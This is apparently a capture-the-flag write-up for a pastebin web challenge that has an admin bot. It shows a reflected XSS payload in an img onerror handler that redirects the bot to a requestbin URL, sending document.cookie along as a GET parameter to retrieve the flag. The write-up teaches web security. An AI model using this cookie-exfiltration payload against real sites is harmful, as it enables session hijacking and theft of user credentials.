Last updated
Last updated
So first things first, create a pastebin. When you go to the display, you'll see a url like
That looks kinda like base64, and if you base64 decode the thing after you'll find it decodes to the content of the pastebin! This allows us to easily create pastebin messages.
There's also an admin bot submit form, where we can submit a url, and the admin bot will visit it.
Rak found that the xss ><img src='' onerror="javascript code"> worked.
First, we can try a simple redirect. ><img src='' onerror="document.location='requestbinurl'">. I set up a requestbin for this purpose. Remember: we base64 encode the payload, and append it to the major part of the url.
, as a sample, works, sending a request to our requestbin. Let's exfiltrate some information. We can use GET parameters to exfiltrate data.
><img src='' onerror='document.location="http://requestbin.net/r/1lfrfyi1?thing=" + document.cookie'>
This would redirect the admin to our requestbin, sending the cookies as the "thing" parameter. Base64 encoding and submitting this as a url, a request on the requestbin pops up with the parameters ?thing=flag=flag{54n1t1z4t10n_k1nd4_h4rd}, giving us the flag,